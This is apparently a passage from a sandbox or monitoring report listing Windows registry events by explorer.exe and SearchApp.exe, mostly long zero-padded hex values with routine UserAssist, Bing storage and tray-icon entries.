000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000001700000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000ba56f3b58810d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a0066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000500000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e6070900420061007200510065007600690072000a00410062006700200066007600740061007200710020007600610000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000700000000000000000000000000000000000000000000000000000000000000d15c0588f2bdd801000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000075ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000081ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000082ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d0036003700
5100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000083ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "10524" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "10524" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "140" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "888" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "140" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001001800000014000000494c200618002400280010001000ffffffff2110ffffffffffffffff424d36000000000000003600000028000000100000004002000001002000000000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
